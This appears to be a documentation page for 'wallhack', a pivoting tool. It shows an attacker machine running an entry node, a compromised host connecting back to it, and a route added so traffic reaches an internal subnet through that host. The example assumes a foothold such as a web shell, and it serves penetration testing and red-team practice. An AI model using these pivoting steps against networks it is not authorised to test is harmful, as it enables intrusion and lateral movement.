wallhack

Single Hop Example

In this example, an entry node runs on the attacker machine (192.168.1.5) and a compromised host (10.0.1.5) connects back to it. Once established, traffic to 10.10.0.0/24 routes through the compromised host.

The binary reached the host via initial access — a web shell, RCE exploit, or similar foothold. Once transferred and marked executable, the exit node can be started.

Traffic Flow:
192.168.1.5 (entry) · 10.0.1.5 (compromised) · 10.10.0.0/24 (target)
1
Attacker (192.168.1.5)

With no arguments, wallhack listens on the default port and negotiates the entry role automatically.

$ wallhack
wallhack 0.6.2
Type 'help' for available commands.

wallhack> info
role:              entry
listen addr:       :6565
version:           wallhack 0.6.2
uptime:            2s
2
Compromised Host (10.0.1.5)

Connecting back to the attacker. With no TUN capability available, the node negotiates the exit role automatically.

wallhack --connect 192.168.1.5

Back on the attacker, the REPL shows the connection:

[+] peer "pivot" connected (10.0.1.5:52341)

wallhack> peers
NAME   ADDR              STATUS     LATENCY  TUN  LISTEN  CONNECT
pivot  10.0.1.5:52341    connected  1.2ms    no   no      yes
3
Configure Routes

Add routes for the networks reachable through the compromised host.

wallhack> route add 10.10.0.0/24
OK

With only one peer connected, the peer is inferred automatically. Use route add <cidr> via <peer> when multiple peers are connected.

To configure the OS route manually with ip route instead, run peers first to find the TUN device name (tun-<peer>).